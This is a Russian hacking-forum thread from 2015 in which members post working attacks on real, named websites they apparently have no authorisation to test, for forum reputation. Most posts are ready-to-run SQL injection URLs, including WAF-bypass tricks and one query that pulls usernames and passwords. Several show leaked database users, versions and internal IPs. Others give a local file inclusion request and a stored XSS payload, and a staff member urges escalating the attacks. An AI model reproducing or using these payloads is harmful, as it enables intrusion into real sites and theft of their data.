Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,363
    Likes Received:
    513
    Reputations:
    20
    Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.

    Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:
    Google:
    Code:
    site:antichat.ru ваш_сайт_с_уязвимостью.ру
    Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.

     
    #1 Егорыч+++, 10 May 2015
    Last edited by a moderator: 31 May 2015
    Mister_Bert0ni likes this.
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    789
    Likes Received:
    912
    Reputations:
    58
  3. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    789
    Likes Received:
    912
    Reputations:
    58
    Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-
    Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .
     
  4. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    789
    Likes Received:
    912
    Reputations:
    58
    Три lfi

    http://greyslon.ru/index.php

    post
    action=register
    &ajax=true
    &data=login%3De%26email%3De%26pass%3De%26repass%3De%26payeer%3De%26captcha%3De
    &page=../info
    Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла
     
  5. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    789
    Likes Received:
    912
    Reputations:
    58
    bidderland.co.in/siteadmin
    Эта уязвимость эксплуатируется за 5 секунд.
    нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.
     
    Bezlishke and Mister_Bert0ni like this.
  6. WallHack

    WallHack Member

    Joined:
    18 Jul 2013
    Messages:
    245
    Likes Received:
    93
    Reputations:
    25
    А что не раскрутил ?
    Code:
    http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+
    Версия: 5.5.43-37.2
    User: c2deuts_ice@localhost
    -----------------------------
    Зачем делать несколько постов можно в одном все выложить
     
    #6 WallHack, 10 May 2015
    Last edited: 10 May 2015
  7. BigBear

    BigBear Well-Known Member
    Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,666
    Likes Received:
    697
    Reputations:
    833
    Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.
     
    _________________________
    Take_IT and yarbabin like this.
  8. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    197
    Likes Received:
    94
    Reputations:
    28
    HTML:
    http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+
    5.5.40-0ubuntu0.12.04.1 - вывод в заголовке

    HTML:
    http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+
    5.6.23

    HTML:
    http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+
    4.1.18-nt
     
  9. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    789
    Likes Received:
    912
    Reputations:
    58
    Четыре
    PHP:
    http://tamugaia.com/hiscman/?framed=yes&g=%66%61%6c%73%65%27 %75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%75%73%65%72%28%29%2c%76%65%72%73%69%6f%6e%28%29%2c%64%61%74%61%62%61%73%65%28%29%2c%35 %2d%2d%20%20%2d
     
  10. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    789
    Likes Received:
    912
    Reputations:
    58
    PHP:
    http://mr.lumbolka.ru/ru/index.php?id=100+and+false+and+extractvalue%281,coNCat%280x3a,version%28%29%29%29+--+%20-
    Спасибо faza02, за подсказку
     
  11. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    197
    Likes Received:
    94
    Reputations:
    28
    HTML:
    http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
    idserver_damico@winwebs03.cpt.wa.co.za
    idserver_damicodb
    5.5.42-cll
     
  12. Mister_Bert0ni

    Mister_Bert0ni Level 8

    Joined:
    10 May 2015
    Messages:
    109
    Likes Received:
    92
    Reputations:
    37
    http://goo.gl/imjzsb
    http://goo.gl/8IKVeV
    http://goo.gl/wYRBLz

    http://emofans.ru/gallery/emowallp/
    POST_DATA:
    foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0x7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version())e)f)x)) -- -



    https://www.choosewellness.com.ph/campus-vote_video-entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE(),0x3c62723e506f727420203a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSION_COMPILE_MACHINE,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e))x)x)
     
    #12 Mister_Bert0ni, 10 May 2015
    Last edited: 11 May 2015
    papaher and BabaDook like this.
  13. Mister_Bert0ni

    Mister_Bert0ni Level 8

    Joined:
    10 May 2015
    Messages:
    109
    Likes Received:
    92
    Reputations:
    37
    Демонстрация SQLi от меня
     
    Шниперсон and kostea like this.
  14. Mister_Bert0ni

    Mister_Bert0ni Level 8

    Joined:
    10 May 2015
    Messages:
    109
    Likes Received:
    92
    Reputations:
    37
    Демонстрация SQLi от меня
     
    Шниперсон and Dondo like this.
  15. Mister_Bert0ni

    Mister_Bert0ni Level 8

    Joined:
    10 May 2015
    Messages:
    109
    Likes Received:
    92
    Reputations:
    37
    SQLi на сайте bitbank
     
    Шниперсон and Dondo like this.
  16. Mister_Bert0ni

    Mister_Bert0ni Level 8

    Joined:
    10 May 2015
    Messages:
    109
    Likes Received:
    92
    Reputations:
    37
    Да да 5 сек даже много)))
     
  17. rezistor

    rezistor New Member

    Joined:
    11 May 2015
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
  18. Arboretum

    Arboretum Member

    Joined:
    8 May 2015
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    http://java.lordy.ru/
    Есть жаба игра, зарегавшись, в чате можно написать "><script>alert(XSS)</script>", после этого на java.lordy.ru высветится XSS.
     
  19. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    197
    Likes Received:
    94
    Reputations:
    28
    HTML:
    http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database%28%29,0x3a,version%28%29%29+--+
    jhewlett_r@209.68.5.201
    jhewlett_prod:5.0.96-log

    HTML:
    http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    5.0.96-log
    nightgallery20@72.167.232.44
    nightgallery20

    HTML:
    http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x2f,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    10.0.17-MariaDB-cll-lve
    austral3_casso@server-2h-r34.ipv4.au.syr

    HTML:
    http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5+--+
    4.0.26-standard-log
    novagoraTest
    novagoraTest@10.0.5.18
     
  20. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    150
    Likes Received:
    30
    Reputations:
    2
Loading...